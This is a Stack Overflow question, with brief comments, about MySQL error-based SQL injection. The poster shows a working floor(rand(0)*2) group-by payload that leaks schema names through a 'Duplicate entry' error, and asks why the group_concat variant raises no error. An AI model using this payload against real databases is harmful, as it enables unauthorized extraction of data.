When I try to use SQL error injection in a no-echo situation, I find that it works when I use group_concat in my query, but it should be an error so that I can get the error information.

The correct usage is:

```sql
select count(*),
       concat(
          (SELECT schema_name FROM information_schema.schemata limit 0,1)
          ,
          floor(rand(0)*2)
       ) x
from information_schema.tables
group by x
```

It returns:

Duplicate entry 'information schema' for key 'group key

But I want to query all at one time. So I use:

```sql
select count(*),
       concat(
         (SELECT group_concat(schema_name) FROM information_schema.schemata)
         ,
         floor(rand(0)*2)
       ) x
from information_schema.tables
group by x
```

But it doesn't return an error. So why? I am grateful for your help.

thinksoso
  • Post some sample data with expected output. – mkRabbani Aug 14 '19 at 06:05
  • Welcome to SO! In its current state, it's hard to tell what your *exact* question is. Please [edit] your question and add a tag for the RDBMS you're using, sample input and expected output. Apart from that: This doesn't look like a question about SQL injection. What exactly are you trying to achieve? – Frank Schmitt Aug 14 '19 at 06:14
  • Interesting question. You are saying that an aggregation query is allowed for a `group by` key, but a non-aggregation query is not. I am surprised that it is allowed. – Gordon Linoff Aug 14 '19 at 12:01
  • Because the floor(rand(0)*2) can be 0 or 1, it is a useful tool in blind SQL injection – thinksoso Aug 14 '19 at 15:56

0 Answers